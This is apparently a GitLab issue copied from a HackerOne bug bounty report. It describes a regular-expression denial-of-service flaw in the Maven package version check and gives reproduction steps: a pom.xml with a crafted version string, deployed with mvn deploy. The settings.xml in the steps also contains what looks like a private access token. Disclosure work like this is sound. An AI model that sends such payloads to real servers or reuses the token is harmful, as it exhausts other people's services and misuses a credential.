Maven package version ReDoS
**[HackerOne report #997961](https://hackerone.com/reports/997961)** by `anyday` on 2020-10-05, assigned to @ngeorge1: [Report](#report) | [Attachments](#attachments) | [How To Reproduce](#how-to-reproduce) ## Report Hello, Maven package version check https://docs.gitlab.com/ee/user/packages/maven_repository/#version-validation contains catastrophic backtracking : `aaaa....!` (https://gitlab.com/gitlab-org/gitlab/-/merge_requests/32925) Steps to reproduce: Follow Maven guide `https://docs.gitlab.com/ee/user/packages/maven_repository/` - generate project `mvn archetype:generate -DgroupId=com.mycompany.mydepartment -DartifactId=my-project -DarchetypeArtifactId=maven-archetype-quickstart -DinteractiveMode=false` - create `settings.xml` with your access token (eg at `/root/.m2/settings.xml`) ``` <settings> <servers> <server> <id>gitlab-maven</id> <configuration> <httpHeaders> <property> <name>Private-Token</name> <value>srzc2-M3ysZx-ZEKQRki</value> </property> </httpHeaders> </configuration> </server> </servers> </settings> ``` Edit `pom.xml` with ``` <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> <modelVersion>4.0.0</modelVersion> <groupId>com.mycompany.mydepartment</groupId> <artifactId>my-project</artifactId> <packaging>jar</packaging> <version>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!/x</version><!-- regular expression denial of service --> <name>my-project</name> <url>http://maven.apache.org</url> <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3.8.1</version> <scope>test</scope> </dependency> </dependencies> <properties><!-- Maven was complaining about something --> <maven.compiler.source>6</maven.compiler.source> <maven.compiler.target>6</maven.compiler.target> </properties> <repositories><!------------------------------------------------------------ replace(3) 'gitlab.com' and 'PROJECT_ID' --> <repository> <id>gitlab-maven</id> <url>https://gitlab.com/api/v4/packages/maven</url> </repository> </repositories> <distributionManagement> <repository> <id>gitlab-maven</id> <url>https://gitlab.com/api/v4/projects/PROJECT_ID/packages/maven</url> </repository> <snapshotRepository> <id>gitlab-maven</id> <url>https://gitlab.com/api/v4/projects/PROJECT_ID/packages/maven</url> </snapshotRepository> </distributionManagement> </project> ``` - `mvn deploy` Video: ![mvn_redos.mp4](https://h1.sec.gitlab.net/a/2fa05a94-2501-459a-bbc8-53c9377c618f/mvn_redos.mp4) #### Impact Denial of service, CPU exhaustion ## Attachments **Warning:** Attachments received through HackerOne, please exercise caution! * [mvn_redos.mp4](https://h1.sec.gitlab.net/a/2fa05a94-2501-459a-bbc8-53c9377c618f/mvn_redos.mp4) ## How To Reproduce Please add [reproducibility information] to this section: 1. 1. 1. [reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues
issue